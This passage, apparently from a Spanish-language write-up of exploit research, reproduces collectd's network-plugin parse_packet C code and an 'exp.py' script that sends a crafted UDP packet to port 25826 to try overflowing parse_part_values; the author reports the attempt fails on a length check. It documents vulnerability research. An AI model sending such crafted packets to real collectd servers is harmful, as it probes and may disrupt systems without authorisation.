sizeof (pkg_type));
memcpy ((void *) &pkg_length,
(void *) (buffer + sizeof (pkg_type)),
sizeof (pkg_length));
pkg_length = ntohs (pkg_length);
pkg_type = ntohs (pkg_type);
if (pkg_length > buffer_size)
break;
/* Ensure that this loop terminates eventually */
if (pkg_length < (2 * sizeof (uint16_t)))
break;
if (pkg_type == TYPE_ENCR_AES256)
{
status = parse_part_encr_aes256 (se,
&buffer, &buffer_size, flags);
if (status != 0)
{
ERROR ("network plugin: Decrypting AES256 "
"part failed "
"with status %i.", status);
break;
}
}
#if HAVE_LIBGCRYPT
else if ((se->data.server.security_level == SECURITY_LEVEL_ENCRYPT)
&& (packet_was_encrypted == 0))
{
if (printed_ignore_warning == 0)
{
INFO ("network plugin: Unencrypted packet or "
"part has been ignored.");
printed_ignore_warning = 1;
}
buffer = ((char *) buffer) + pkg_length;
continue;
}
#endif /* HAVE_LIBGCRYPT */
else if (pkg_type == TYPE_SIGN_SHA256)
{
status = parse_part_sign_sha256 (se,
&buffer, &buffer_size, flags);
if (status != 0)
{
ERROR ("network plugin: Verifying HMAC-SHA-256 "
"signature failed "
"with status %i.", status);
break;
}
}
#if HAVE_LIBGCRYPT
else if ((se->data.server.security_level == SECURITY_LEVEL_SIGN)
&& (packet_was_encrypted == 0)
&& (packet_was_signed == 0))
{
if (printed_ignore_warning == 0)
{
INFO ("network plugin: Unsigned packet or "
"part has been ignored.");
printed_ignore_warning = 1;
}
buffer = ((char *) buffer) + pkg_length;
continue;
}
#endif /* HAVE_LIBGCRYPT */
else if (pkg_type == TYPE_VALUES)
{
status = parse_part_values (&buffer, &buffer_size,
&vl.values, &vl.values_len);
if (status != 0)
break;
network_dispatch_values (&vl, username);
sfree (vl.values);
}
else if (pkg_type == TYPE_TIME)
{
uint64_t tmp = 0;
status = parse_part_number (&buffer, &buffer_size,
&tmp);
if (status == 0)
{
vl.time = TIME_T_TO_CDTIME_T (tmp);
n.time = TIME_T_TO_CDTIME_T (tmp);
}
}
else if (pkg_type == TYPE_TIME_HR)
{
uint64_t tmp = 0;
status = parse_part_number (&buffer, &buffer_size,
&tmp);
if (status == 0)
{
vl.time = (cdtime_t) tmp;
n.time = (cdtime_t) tmp;
}
}
else if (pkg_type == TYPE_INTERVAL)
{
uint64_t tmp = 0;
status = parse_part_number (&buffer, &buffer_size,
&tmp);
if (status == 0)
vl.interval = TIME_T_TO_CDTIME_T (tmp);
}
else if (pkg_type == TYPE_INTERVAL_HR)
{
uint64_t tmp = 0;
status = parse_part_number (&buffer, &buffer_size,
&tmp);
if (status == 0)
vl.interval = (cdtime_t) tmp;
}
else if (pkg_type == TYPE_HOST)
{
status = parse_part_string (&buffer, &buffer_size,
vl.host, sizeof (vl.host));
if (status == 0)
sstrncpy (n.host, vl.host, sizeof (n.host));
}
else if (pkg_type == TYPE_PLUGIN)
{
status = parse_part_string (&buffer, &buffer_size,
vl.plugin, sizeof (vl.plugin));
if (status == 0)
sstrncpy (n.plugin, vl.plugin,
sizeof (n.plugin));
}
else if (pkg_type == TYPE_PLUGIN_INSTANCE)
{
status = parse_part_string (&buffer, &buffer_size,
vl.plugin_instance,
sizeof (vl.plugin_instance));
if (status == 0)
sstrncpy (n.plugin_instance,
vl.plugin_instance,
sizeof (n.plugin_instance));
}
else if (pkg_type == TYPE_TYPE)
{
status = parse_part_string (&buffer, &buffer_size,
vl.type, sizeof (vl.type));
if (status == 0)
sstrncpy (n.type, vl.type, sizeof (n.type));
}
else if (pkg_type == TYPE_TYPE_INSTANCE)
{
status = parse_part_string (&buffer, &buffer_size,
vl.type_instance,
sizeof (vl.type_instance));
if (status == 0)
sstrncpy (n.type_instance, vl.type_instance,
sizeof (n.type_instance));
}
else if (pkg_type == TYPE_MESSAGE)
{
status = parse_part_string (&buffer, &buffer_size,
n.message, sizeof (n.message));
if (status != 0)
{
/* do nothing */
}
else if ((n.severity != NOTIF_FAILURE)
&& (n.severity != NOTIF_WARNING)
&& (n.severity != NOTIF_OKAY))
{
INFO ("network plugin: "
"Ignoring notification with "
"unknown severity %i.",
n.severity);
}
else if (n.time <= 0)
{
INFO ("network plugin: "
"Ignoring notification with "
"time == 0.");
}
else if (strlen (n.message) <= 0)
{
INFO ("network plugin: "
"Ignoring notification with "
"an empty message.");
}
else
{
plugin_dispatch_notification (&n);
}
}
else if (pkg_type == TYPE_SEVERITY)
{
uint64_t tmp = 0;
status = parse_part_number (&buffer, &buffer_size,
&tmp);
if (status == 0)
n.severity = (int) tmp;
}
else
{
DEBUG ("network plugin: parse_packet: Unknown part"
" type: 0x%04hx", pkg_type);
buffer = ((char *) buffer) + pkg_length;
}
} /* while (buffer_size > sizeof (part_header_t)) */
if (status == 0 && buffer_size > 0)
WARNING ("network plugin: parse_packet: Received truncated "
"packet, try increasing 'MaxPacketSize'");
return (status);
} /* }}} int parse_packet */
Actualización 2:
Hmmmm ... no go ... estaba intentando desbordar los valores de parse_part_values () pero hay una comprobación de esto:
Hmmmm ... aquí se detiene:
[2017-02-12 16:43:18] complemento de red: parse_part_values: paquete demasiado corto: se espera un fragmento del tamaño 726, pero el búfer solo tiene 51 bytes.
Aquí está el código que produce arriba:
exp.py
import socket
UDP_IP = "127.0.0.1"
UDP_PORT = 25826
print "UDP target IP:", UDP_IP
print "UDP target port:", UDP_PORT
sock = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
str="\x00\x05\x00\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x40\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x63\x00\x00\x05\x00\x40\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x06\x00\x33\x00\x50\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40"
sock.sendto(str,(UDP_IP, UDP_PORT))
A continuación se muestra un marco desensamblado en Wireshark para el código anterior: